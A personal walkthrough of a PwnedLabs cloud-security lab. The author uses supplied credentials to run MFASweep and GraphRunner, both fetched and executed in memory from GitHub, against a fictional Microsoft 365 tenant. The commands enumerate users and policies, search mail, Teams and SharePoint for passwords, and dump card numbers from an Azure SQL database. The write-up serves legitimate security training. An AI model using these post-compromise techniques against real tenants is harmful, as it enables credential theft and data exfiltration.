4. Loot Exchange, Teams and SharePoint with GraphRunner
This write-up is based on PwnedLabs.io’s free module, Loot Exchange, Teams and SharePoint with GraphRunner, which offers top-notch content at an unbeatable price. While I’m not affiliated with PwnedLabs.io, I highly recommend their resources. Learn more about their subscription options at PwnedLabs.io/pricing.
Start with Credentials
#### Azure credentials
##### Password: *****
##### IAM User: Clara.Miller@megabigtech.com
Key Takeaways
- Identify MFA-enabled and disabled services!
1. MFA Sweeps
Download MFA Sweeps:
IEX (iwr 'https://raw.githubusercontent.com/dafthack/MFASweep/master/MFASweep.ps1')
Invoke-MFASweep -Username Clara.Miller@megabigtech.com -Password ***** -Recon -IncludeADFS
It will output a lot of data. The last table summarizes the results well.
The second thing I noticed was a sentence in blue:
ADFS does not appear to be in use. Authentication appears to be managed by Microsoft.
1.1 What is ADFS and What Does This Mean?
Active Directory Federation Services (ADFS) is a tool that helps connect a company's local network (on-premises) to cloud services. It allows employees to use their regular work login to access both on-premises apps and cloud apps without needing a separate cloud password. It is similar to a single sign-on service. More information can be found here: ../Azure Services/Active Directory Federation Services (ADFS).
This made me curious about other authentication methods.
../Azure General/IAM/How does a user authenticate to the cloud?
Hence, ADFS does not appear to be in use. Authentication appears to be managed by Microsoft. It seems the authentication is solely handled by Microsoft's cloud identity service, possibly Entra ID.
1.2 What is Microsoft Graph API?
../Azure Services/Microsoft Graph
Simply put, Microsoft Graph is a gateway to Microsoft cloud services, and Graph API is how we, as users, can access Microsoft Graph.
1.3 What is Microsoft API Management?
https://learn.microsoft.com/en-us/azure/api-management/api-management-key-concepts
../Azure Services/Azure API Management
Azure API Management is a way to manage various APIs.
Azure API Management is a hybrid, multicloud management platform for APIs across all environments. As a platform-as-a-service, API Management supports the complete API lifecycle.
2. Walkthrough
-
Get credentials.
-
Check MFA-enabled/disabled services using MFA Sweeps. #1. MFA Sweeps
-
Log in and retrieve assigned Microsoft 365 licenses. ../Azure Services/Microsoft Graph
PS> Connect-MgGraph PS> Get-MgUserLicenseDetail -UserId "Clara.Miller@megabigtech.com" Id SkuId SkuPartNumber -- ----- ------------- 78yQJX1oO0mujUQcurY6chhRVTtq2hhEiU998eIJaHA 3b555118-da6a-4418-894f-7df1e2096870 O365_BUSINESS_ESSENTIALSIronically, I no longer see the Business Essentials plan listed among Microsoft business plans.
-
Enumerate Graph API. ../Azure Services/Microsoft Graph
Knowing that the user account has an assigned Microsoft 365 license and access to Graph API and API Management services, we can enumerate further.
IEX (iwr 'https://raw.githubusercontent.com/dafthack/GraphRunner/main/GraphRunner.ps1')According to Black Hills, GraphRunner is a post-exploitation tool used to gather information about the Graph API. Video.
We built a post-compromise toolset called GraphRunner for interacting with the Microsoft Graph API.
GraphRunner tool information can be found here: ../Azure Services/Microsoft Graph#4.2 Complete Workflow of System Information Gaining.
2.1 Start Authentication with GraphRunner
After logging in, the first step is to authenticate with the system. ../Azure Services/Microsoft Graph#4.2.1 Authentication Flow.
The Get-GraphTokens command was really simple. All I had to do was log in with the given code and enter Clara's credentials. Once the authentication process was complete, the token was saved in the $token variable.
PS> Get-GraphTokens
[*] It looks like you already have tokens set in your $tokens variable. Are you sure you want to authenticate again?
y
[*] Initiating device code login...
To sign in, use a web browser to open the page https://microsoft.com/devicelogin and enter the code AGVQ7MD48 to authenticate.
However, Get-AzureAppTokens requires a bit more information.
PS> Get-AzureAppTokens
cmdlet Get-AzureAppTokens at command pipeline position 1
Supply values for the following parameters:
Scope:
ClientID:
ClientSecret:
RedirectUri:
AuthCode:
Get-AzureAppTokens: Cannot bind argument to parameter 'Scope' because it is an empty string.
2.2 Recon and Enumeration
Once I had the user's login information, instead of following the walkthrough, I decided to have a little more fun.
Let's use the ../Azure Services/Microsoft Graph#4.2.2 Recon & Enumeration Flow.
2.2.1 Invoke-GraphRecon
PS> Invoke-GraphRecon -Tokens $tokens
[*] Using the provided access tokens.
[*] Refreshing token to the Azure AD Graph API...
[*] Now trying to query the MS provisioning API for organization settings.
================================================================================
Main Contact Info
================================================================================
Display Name: Default Directory
Street: 165 The Broadway
City: London
State:
Postal Code: SW19 1NE
Country: GB
Technical Notification Email: ian@cloudpwned.com
Telephone Number:
================================================================================
Directory Sync Settings
================================================================================
Initial Domain: iancloudpwned.onmicrosoft.com
Directory Sync Enabled: true
Directory Sync Status: Enabled
Directory Sync Client Machine: DCNY02
Directory Sync Service Account: Sync_DCNY02_8668877016c3@iancloudpwned.onmicrosoft.com
Password Sync Enabled: true
================================================================================
User Settings
================================================================================
Self-Service Password Reset Enabled: true
Users Can Consent to Apps: true
Users Can Read Other Users: true
Users Can Create Apps: false
Users Can Create Groups: false
================================================================================
Additional Service Parameters
================================================================================
RootAdminUrl : https://iancloudpwned-admin.sharepoint.com/
RootIWSPOUrl : https://iancloudpwned-my.sharepoint.com/
SPO_RootSiteUrl : https://iancloudpwned.sharepoint.com/
SPO_TenantUpgradeUrl : https://iancloudpwned-admin.sharepoint.com/
SPO_TenantAdminUrl : https://iancloudpwned-admin.sharepoint.com/
SPO_TenantAdmin_CreateSiteCollectionUrl : https://iancloudpwned-admin.sharepoint.com/_layouts/15/online/CreateSiteFull.aspx
SPO_TenantAdmin_ViewSiteCollectionsUrl : https://iancloudpwned-admin.sharepoint.com/
SPO_TenantAdmin_ProjectAdminUrl : https://iancloudpwned-admin.sharepoint.com/
SPO_MySiteHostUrl : https://iancloudpwned-my.sharepoint.com/
SPO_MySiteHost_NewsFeedUrl : https://iancloudpwned-my.sharepoint.com/default.aspx
SPO_MySiteHost_DocumentsUrl : https://iancloudpwned-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllDocuments
SPO_MySiteHost_SitesUrl : https://iancloudpwned-my.sharepoint.com/_layouts/15/MySite.aspx?MySiteRedirect=AllSites
SPO_MySiteHost_AboutMeUrl : https://iancloudpwned-my.sharepoint.com/person.aspx
SPO_MySiteHost_ProjectSiteUrl : https://iancloudpwned-my.sharepoint.com/_layouts/15/MyProjects.aspx
SPO_PublicWebSiteUrl : NotSupported
SPO_PublicWebSitePublicUrl :
SPO_LegacyPublicWebSiteUrl :
SPO_LegacyPublicWebSiteEditPage : Pages/Forms/AllItems.aspx
SPO_LegacyPublicWebSitePublicUrl :
OfficeGraphUrl : https://iancloudpwned-my.sharepoint.com/_layouts/15/me.aspx
SPO_RegionalRootSiteUrl : https://iancloudpwned.sharepoint.com/
StreamLaunchConfig : 21
ShowSkyDrivePro_InitialVisibility : True
ShowYammerNewsFeed_InitialVisibility : True
ShowSites_InitialVisibility : True
ServiceInformation_LastChangeDate : 9/11/2024 5
:39:21 AM
InstanceId : 7dff6839-e224-45de-b8cd-042646389e73
EnableOneDriveforSuiteUsers : False
YammerEnterprise_AdminUrl : https://www.yammer.com/iancloudpwned.onmicrosoft.com/admin
================================================================================
Authorization Policy Info
================================================================================
Allowed to create app registrations (Default User Role Permissions): False
Allowed to create security groups (Default User Role Permissions): False
Allowed to create tenants (Default User Role Permissions): False
Allowed to read Bitlocker keys for own device (Default User Role Permissions): True
Allowed to read other users (Default User Role Permissions): True
Who can invite external users to the organization: adminsAndGuestInviters
Users can sign up for email-based subscriptions: True
Users can use Self-Serve Password Reset: True
Users can join the tenant by email validation: False
Users can consent to risky apps: False
Block MSOL PowerShell: False
Guest User Role Template ID: 10dae51f-b6af-4016-8d66-8c2a99b929b3
Guest User Policy: Guest users have limited access to properties and memberships of directory objects
From the above information, I attempted to log in to the SharePoint website. However, MFA authentication was enabled.
2.2.2 Invoke-DumpCAPS
Under the Clara Miller section, I found something interesting.
Excluded Applications: 14d82eec-204b-4c2f-b7e8-296a70dab67e, 797f4846-ba00-4fd7-ba43-dac1f8f63013. I was not able to log in to the Azure Portal with Clara's credentials, but Google helped me.
https://practical365.com/secure-internet-access-microsoft-graph-powershell-sdk/
It seems like 797f4846-ba00-4fd7-ba43-dac1f8f63013 is generally Azure API Management, and 14d82eec-204b-4c2f-b7e8-296a70dab67e is the SDK App. ../Azure Services/SDKs
PS> Invoke-DumpCAPS -Tokens $tokens
================================================================================
Display Name: Require MFA for Clara Miller
Policy Type: 18
Policy State: Enabled
Conditions:
Applications:
Include:
Applications: All
Exclude:
Applications: 14d82eec-204b-4c2f-b7e8-296a70dab67e, 797f4846-ba00-4fd7-ba43-dac1f8f63013
Users:
Include:
Users: 36fa333d-1720-4920-8a5c-2b9b696c6adf
ClientTypes:
Include:
ClientTypes: Browser, EasSupported, EasUnsupported, OtherLegacy, LegacySmtp, LegacyPop, LegacyImap, LegacyMapi, LegacyOffice
Controls: MFA
Earlier in #1. MFA Sweeps, Graph API and API management were the ones where MFA was not enabled.
For now, I will just move on to the next step.
2.2.3 Invoke-DumpApps
This commands spit out good chunk of data. Some results were worth to note.
One key point was 14d82eec-204b-4c2f-b7e8-296a70dab67e was previously identified with Invoke-DumpCAPS command. #2.2.2 Invoke-DumpCAPS.
According to the Invoke-DumpApps, 14d82eec-204b-4c2f-b7e8-296a70dab67e is for an external App, Microsoft Graph Command Line Tools.
PS> Invoke-DumpApps -Tokens $tokens
================================================================================
App Name: megabigtech-dev (App ID: 378ac9d7-056c-49d7-8ea0-e86250e1fb9a)
Creation Date: 12/18/2023 21:03:27
Sign-In Audience: AzureADMyOrg
Consented User: Ian Austin (User ID: 18600f1a-3cee-434e-860f-aff4078da055)
Consented User: Budi Setiawan (User ID: f851f8c9-1105-4f57-aa77-d4c440dfb16a)
Consented User: Annette Palmer (User ID: 9861fd14-539c-4f98-becf-ce2c9eac3c99)
Delegated Permissions (Scopes): User.Read
...snip...
External App: PowerShell.MSGraph
AppId: 5e79add2-6288-4d91-bebc-cae920227404
Object ID: c25378ab-f923-49d2-8616-7119f4eecc57
appOwnerOrganizationId: 9188040d-6c67-4c5b-b112-36a304b66dad
Creation Date: 05/31/2024 19:05:55
Scope of Consent:
offline_access, Delegated, Clara.Miller@megabigtech.com
openid, Delegated, Clara.Miller@megabigtech.com
External App: Graph Explorer
AppId: de8bc8b5-d9f9-48b1-a8ad-b748da725064
Object ID: 881df9b0-62d7-4dfc-8bfa-3f358bf7cd9b
appOwnerOrganizationId: 72f988bf-86f1-41af-91ab-2d7cd011db47
Creation Date: 12/07/2023 14:04:22
Scope of Consent:
Invoke-RestMethod:
Line |
3531 | … serobject = Invoke-RestMethod -uri "$($graphApiUrl)/users/$userorgrou …
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| {"error":{"code":"TooManyRequests","message":"Too many requests from Identifier:d3590ed6-52b3-4102-aeff-aad2292ab01c under categ
ory:aadgraph.app. Please try again later.","innerError":{"date":"2024-09-12T14:19:55"}}}
Invoke-RestMethod:
External App: Microsoft Graph Command Line Tools
AppId: 14d82eec-204b-4c2f-b7e8-296a70dab67e
Object ID: 7176f94c-6797-4cea-b5a6-172aeddf7d14
appOwnerOrganizationId: 72f988bf-86f1-41af-91ab-2d7cd011db47
Creation Date: 10/12/2023 17:11:27
Scope of Consent:
At one point, I was getting Too many requests.... error.
Invoke-RestMethod:
Line |
3531 | … serobject = Invoke-RestMethod -uri "$($graphApiUrl)/users/$userorgrou …
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| {"error":{"code":"TooManyRequests","message":"Too many requests from Identifier:d3590ed6-52b3-4102-aeff-aad2292ab01c under category:aadgraph.app. Please try again later.","innerError":{"date":"2024-09-12T14:19:28"}}}
user_impersonation, Delegated,
Invoke-RestMethod:
2.2.4 Get-AzureADUsers
This commands spits out all ADUsers.
PS> Get-AzureADUsers -Tokens $tokens
cmdlet Get-AzureADUsers at command pipeline position 1
Supply values for the following parameters:
outfile: test.txt
[*] Gathering the users from the tenant.
---All Azure AD User Principal Names---
Akari.Fukimo@megabigtech.com
Akira.Suzuki@megabigtech.com
alee@megabigtech.com
Alexandra.Wu@megabigtech.com
Alice.Garcia@megabigtech.com
ian_cloudpwned.com#EXT#@iancloudpwned.onmicrosoft.com
...snip...
security-user@megabigtech.com
Seline.Diaz@megabigtech.com
serene@megabigtech.com
serveruser@megabigtech.com
stan.lee@megabigtech.com
Sunita.Williams@megabigtech.com
sunita_adm@megabigtech.com
Sync_DCNY02_8668877016c3@iancloudpwned.onmicrosoft.com
tim.cooke@megabigtech.com
truls@megabigtech.com
Sunita.Williams@megabigtech.com
sunita_adm@megabigtech.com
Sync_DCNY02_8668877016c3@iancloudpwned.onmicrosoft.com
tim.cooke@megabigtech.com
truls@megabigtech.com
William.Martinez@megabigtech.com
William.Smith@megabigtech.com
yuki.tanaka@megabigtech.com
Yumi.Nakamura@megabigtech.com
Discovered 71 users
2.2.5 Get-SecurityGroups
No luck with Get-SecurityGroups.
PS> Get-SecurityGroups -Tokens $tokens
[*] Using the provided access tokens.
[*] Retrieving a list of security groups and their members from the directory...
[*] An error occurred while retrieving security groups: Response status code does not indicate success: 429 ().
2.2.6 Get-SharePointSiteURLs
The result of Get-SharePointSiteURLs, displays share point site URLs. Clara's account is MFA authenticated. However, I was able to take a look the site with Security-user credentials.
With that, we got more credentials. Yeah. However, This is not intended way for this lab.
PS> Get-SharePointSiteURLs -Tokens $tokens
[*] Using the provided access tokens.
[*] Now getting SharePoint site URLs...
[*] Found a total of 14 site URLs.
Web URL: https://iancloudpwned.sharepoint.com/FormServerTemplates/Forms/All Forms.aspx
Web URL: https://iancloudpwned.sharepoint.com/Shared Documents/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/allcompany/FormServerTemplates/Forms/All Forms.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/allcompany/Shared Documents/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/allcompany/Style Library/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/FormServerTemplates/Forms/All Forms.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/Shared Documents/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/SiteAssets/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/Style Library/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/FormServerTemplates/Forms/All Forms.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Shared Documents/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/SiteAssets/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Style Library/Forms/AllItems.aspx
Web URL: https://iancloudpwned.sharepoint.com/Style Library/Forms/AllItems.aspx
2.2.7 Invoke-GraphOpenInboxFinder
We confirmed that we can read Clara's mailbox. It makes total sense because we are using Clara's credentials.
PS> Invoke-GraphOpenInboxFinder -Tokens $tokens
cmdlet Invoke-GraphOpenInboxFinder at command pipeline position 1
Supply values for the following parameters:
userlist: ./test.txt
[*] Note: To read other user's mailboxes your token needs to be scoped to the Mail.Read.Shared or Mail.ReadWrite.Shared permissions.
[*] Checking access to mailboxes for each email address...
[*] SUCCESS! Inbox of Clara.Miller@megabigtech.com is readable.
Latest Email Received 11/06/2023 14:51:57 with subject: Quick Heads-Up on This Month's Recons!
70 of 71 mailboxes checked
2.3 Pillage Flow
2.3.1 Invoke-SearchSharePointAndOneDrive
So fortunately, this command support the wild card character and download files. Since I am using pwsh from linux, I tried to read those files with O365.
However, You need permission to access this item. So it is interesting to me that Clara has privilege to download, but I need her MFA device to use GUI. With Security-user credential, I can view limited files.
PS> Invoke-SearchSharePointAndOneDrive -searchTerm * -Tokens $tokens
[*] Using the provided access tokens.
[*] Found 14 matches for search term *
Result [0]
File Name: passwords.xlsx
Location: https://iancloudpwned.sharepoint.com/Shared Documents/passwords.xlsx
Created Date: 03/27/2024 00:13:10
Last Modified Date: 07/22/2024 08:20:00
Result [1]
File Name: Bonuses - Confidential.xlsx
Location: https://iancloudpwned-my.sharepoint.com/personal/sam_olsson_megabigtech_com/Documents/Bonuses - Confidential.xlsx
https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Shared Documents/Finance Logins.docx
Result [3]
File Name: Finance Logins.docx
Location: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Shared Documents/Finance Logins.docx
...snip...
================================================================================
Result [4]
File Name: Document.docx
Location: https://iancloudpwned.sharepoint.com/sites/FinanceTeam/Shared Documents/Document.docx
...snip...
================================================================================
Result [5]
File Name: Default Directory Notebook
Location: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/SiteAssets/Default Directory Notebook
...snip...
================================================================================
Result [6]
File Name: __siteIcon__.jpg
Location: https://iancloudpwned.sharepoint.com/sites/DefaultDirectory/SiteAssets/Forms/DispForm.aspx?ID=2 ...snip...
================================================================================
...snip...
...snip...
It is such a pain to view Excel file in Linux, hence I decided to cheat little bit. I used Security-User credentials to view the content.
2.3.2 Invoke-SearchMailbox
PS> Invoke-SearchMailbox -SearchTerm * -Tokens $tokens
[*] Using the provided access tokens.
[*] Found 98 matches for search term *
Subject: Subscribers database | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Ols
son | Date: 11/06/2023 17:24:50 | Message Preview: Hi Sam, IT have set up our access to the subscriptions database, so we can start pulling on this data for the quarterly management metrics
. Shared login below: Username: ...
================================================================================
Subject: RE: Quick Heads-Up on This Month's Recons! | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-1
7 | Receivers: Sam Olsson | Date: 11/06/2023 14:59:37 | Message Preview: Sounds good. Thanks! From: Sam Olsson <Sam.Olsson@megabigtech.com> Sent: Monday, November 6, 2023 2:52 PM To: Clara
Miller <Clara.Miller@megabigtech.com> Subject: Quick Heads-Up on...
================================================================================
Subject: Quick Heads-Up on This Month's Recons! | Sender: Sam.Olsson@megabigtech.com | Receivers: Clara Miller | Date: 11/06/2023 14:51:56 | Message Preview: Hey Clara, Hope you're doing we
ll! Just wanted to drop you a quick note about the reconciliations we've got lined up for the end-of-month close. Here's what's on the deck: Bank ...
================================================================================
[*] Do you want to download these emails and their attachments? (Yes/No)
yes
WARNING: Resulting JSON is truncated as serialization has exceeded the set depth of 2.
[*] Emails and attachments have been exported to the folder mailsearch-20240912115820.
[*] A simple emailviewer.html has been provided to view the exported emails.
[*] To use it run the Invoke-HTTPServer module in the mailsearch-20240912115820 directory and then navigate to http://localhost:8000/emailviewer.html
PS> Invoke-HTTPServer
Another cool feature is that I can download emails and read it via web browser.
2.3.3 Invoke-SearchTeams
Invoke-SearchTeams -SearchTerm * -Tokens $tokens
[*] Using the provided access tokens.
[*] Refreshing token for Teams use...
From: Clara.Miller@megabigtech.com | Summary: Call IT to reset my password for accounting system
Full Message Body: <html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body><p>Call IT to reset my password for accounting system</p></body></html>
================================================================================
From: Clara.Miller@megabigtech.com | Summary: password: *****
Full Message Body: <html><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><body><p>password: *****</p></body></html>
2.3.4 Get-TeamsChat
PS> Get-Teamschat -Tokens $tokens
[*] Using the provided access tokens.
[*] Now getting Teams chat conversations for current user.
Invoke-RestMethod:
Line |
2833 | … sResponse = Invoke-RestMethod -Uri "$graphBaseUrl$chatEndpoint" -Head …
| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
| {"error":{"code":"Forbidden","message":"Missing scope permissions on the request. API requires one of 'Chat.ReadBasic, Chat.Read, Chat.ReadWrite'. Scopes on the request 'AuditLog.Create, AuditLog.Read.All, Calendar.ReadWrite, Calendars.Read.Shared, Calendars.ReadWrite, Contacts.ReadWrite, DataLossPreventionPolicy.Evaluate, Directory.AccessAsUser.All, Directory.Read.All, Files.Read, Files.Read.All, Files.ReadWrite.All, Group.Read.All, Group.ReadWrite.All, InformationProtectionPolicy.Read, Mail.ReadWrite, Mail.Send, Notes.Create, Organization.Read.All, People.Read, People.Read.All, Printer.Read.All, PrinterShare.ReadBasic.All, PrintJob.ReadWriteBasic, SensitiveInfoType.Detect, SensitiveInfoType.Read.All, SensitivityLabel.Evaluate, Tasks.ReadWrite, TeamMember.ReadWrite.All, TeamsTab.ReadWriteForChat, User.Read.All, User.ReadBasic.All, User.ReadWrite, Users.Read'","innerError":{"date":"2024-09-12T18:59:37","request-id":"2353bfdc-e820-451a-91d5-a0bf65f61ad2","client-request-id":"2353bfdc-e820-451a-91d5-a0bf65f61ad2"}}}
No chats found for the authenticated user.
2.2 Continue with the Walkthrough.
I used the Google Doc to read the word document.
If you don't love Database, you are not a tester!! However, this is not possible to access by just looking at the URL.
Service/Account: Finance Database
URL: https://10.10.11.15/login
Username: finadmin
Password: *****
Service/Account: Accounting Software
URL: https://accounting.megabigtech.local
Username: accounting_user
Password: *****
Service/Account: Payroll System
URL: https://payrollonlinembt.corp.net
Username: payrollmanager
Password: *****
Service/Account: Bank Portal
URL: https://onlinebanking.megabank.com
Username: finusermbt
Password: *****
Service/Account: Expense Reporting
URL: https://expenses.megabigtech.local
Username: expensereport_user
Password: *****
Also, manage to open the Bonuses file.
So earlier on #2.3.2 Invoke-SearchMailbox, I used Invoke-SearchMailbox command to view the mailbox. And I thought the wild character * was consider as all. Once I read the actual lab, I realize that was a mistake. So let's take a look at it.
PS> Invoke-SearchMailbox -Tokens $tokens -SearchTerm "Clara" -MessageCount 80
[*] Using the provided access tokens.
[*] Found 15 matches for search term Clara
Subject: Subscribers database | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Ols
son | Date: 11/06/2023 17:24:50 | Message Preview: ...windows.net Database: Finance Clara ...
================================================================================
Subject: Quick Heads-Up on This Month's Recons! | Sender: Sam.Olsson@megabigtech.com | Receivers: Clara Miller | Date: 11/06/2023 14:51:56 | Message Preview: Hey Clara, Hope you're doing we
ll! Just wanted to drop you a quick note about the reconciliations we've got lined up for the end-of-month close. Here's what's on the deck: Bank ...
================================================================================
Subject: Subscribers database | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Ols
son | Date: 11/06/2023 17:24:50 | Message Preview: ...windows.net Database: Finance Clara ...
================================================================================
Subject: RE: Quick Heads-Up on This Month's Recons! | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-1
7 | Receivers: Sam Olsson | Date: 11/06/2023 14:59:37 | Message Preview: ...6, 2023 2:52 PM To: Clara Miller <Clara.Miller@megabigtech.com> Subject: Quick Heads-Up on This Month's Recons! H
ey Clara, Hope you're doing well! Just wanted to drop you a quick ...
================================================================================
Subject: Quick Heads-Up on This Month's Recons! | Sender: Sam.Olsson@megabigtech.com | Receivers: Clara Miller | Date: 11/06/2023 14:51:56 | Message Preview: Hey Clara, Hope you're doing we
ll! Just wanted to drop you a quick note about the reconciliations we've got lined up for the end-of-month close. Here's what's on the deck: Bank ...
================================================================================
[*] Do you want to download these emails and their attachments? (Yes/No)
PS> Invoke-SearchMailbox -Tokens $tokens -SearchTerm "password" -MessageCount 40
[*] Using the provided access tokens.
[*] Found 5 matches for search term password
Subject: Subscribers database | Sender: /O=EXCHANGELABS/OU=EXCHANGE ADMINISTRATIVE GROUP (FYDIBOHF23SPDLT)/CN=RECIPIENTS/CN=EF775FA670FB409789970E587F6F4F04-36FA333D-17 | Receivers: Sam Olsson | Date: 11/06/2023 17:24:50 | Message Preview: ...login below: Username: financereports Password: $********** Server: mbt-finance.database.windows.net Database: Finance Clara ...
================================================================================
[*] Do you want to download these emails and their attachments? (Yes/No)
See the difference? I missed the critical information.
It seems like some sort of database is needed. What do I know about database here? Nothing. So let's dig a little bit. With knowing that this is for the SQL database, we can use the database enumeration commands.
../Azure Services/Azure SQL#2.1 For database
So here are knows.
Username: financereports
Password: ******
Server: mbt-finance.database.windows.net
Database: Finance
It turns out there is a sql server I can connect to. FQND indicates the server name.
az sql server list
[
{
"administratorLogin": "manager",
...snip...
"fullyQualifiedDomainName": "mbt-finance.database.windows.net",
"id": "/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourceGroups/content-static-2/providers/Microsoft.Sql/servers/mbt-finance",
...snip...
"location": "eastus",
"minimalTlsVersion": "1.2",
"name": "mbt-finance",
...snip...
"resourceGroup": "content-static-2",
...snip...
"type": "Microsoft.Sql/servers",
"version": "12.0",
...snip...
}
]
We got the same information. I guess this command will only pull the specific server.
PS> az sql server show --resource-group "content-static-2" --name "mbt-finance"
{
"administratorLogin": "manager",
...snip...
"fullyQualifiedDomainName": "mbt-finance.database.windows.net",
"id": "/subscriptions/ceff06cb-e29d-4486-a3ae-eaaec5689f94/resourceGroups/content-static-2/providers/Microsoft.Sql/servers/mbt-finance",
...snip...
"name": "mbt-finance",
...snip...
"type": "Microsoft.Sql/servers",
"version": "12.0",
"workspaceFeature": null
}
2.2.1 Accessing Azure SQL database with sqlcmd
../Azure Services/Azure SQL#3.1 sqlcmd
So instead of using the GUI from the lab, I decided to go with sqlcmd!!
Login with the given information. For no reason, check the version of the database.
./sqlcmd -S mbt-finance.database.windows.net -U financereports -d Finance
1> select @@version
2> go
Microsoft SQL Azure (RTM) - 12.0.2000.8
Sep 3 2024 11:34:29
Copyright (C) 2022 Microsoft Corporation
Then get the database information. I see two databases are available.
1> SELECT name FROM sys. databases;
2> go
name
master
Finance
Here I decided to with the Finance. So as we can see, I already have information of database. I need table and column information.
1> use Finance
2> go
Changed database context to 'Finance'.
1> select table_name from information_schema.Tables
2> go
table_name
database_firewall_rules
Subscribers
1> select column_name from information_schema.columns
2> go
column_name
create_date
end_ip_address
id
modify_date
name
start_ip_address
BirthDate
CardNumber
CVV
ExpiryDate
FullName
SubscriberID
(12 rows affected)
So I identified the needed information and found the flag!
1> select * from Subscribers
2> go SubscriberID CardNumber ExpiryDate CVV FullName
BirthDate ...snip...
ebb7c066-b630-4794-9d3a-06451a685b65 4532756279624064 2025-12-01 123 Alex Smith
1990-06-15
d4148d1d-f65e-45da-93fe-a47e39fa011b 5399832489200328 2023-11-01 311 Jamie Doe
1982-03-22
or
1> select fullname from Subscribers
2> go
fullname
...snip...
Flag: 82b55974e50db8c02b4119a976c3570b
2.2.2 Accessing Azure SQL database with Powershell
From the exercise, 4. Loot Exchange, Teams and SharePoint with GraphRunner
$conn = New-Object System.Data.SqlClient.SqlConnection
$password='*****'
$conn.ConnectionString = "Server=mbt-finance.database.windows.net;Database=Finance;User ID=financereports;Password=$password;"
$conn.Open()
$sqlcmd = $conn.CreateCommand()
$sqlcmd.Connection = $conn
$query = "SELECT * FROM Subscribers;"
$sqlcmd.CommandText = $query
$adp = New-Object System.Data.SqlClient.SqlDataAdapter $sqlcmd
$data = New-Object System.Data.DataSet
$adp.Fill($data) | Out-Null
$data.Tables | ft
2.2.3 With VSCODE!
This was something I learned and thought this was really cool.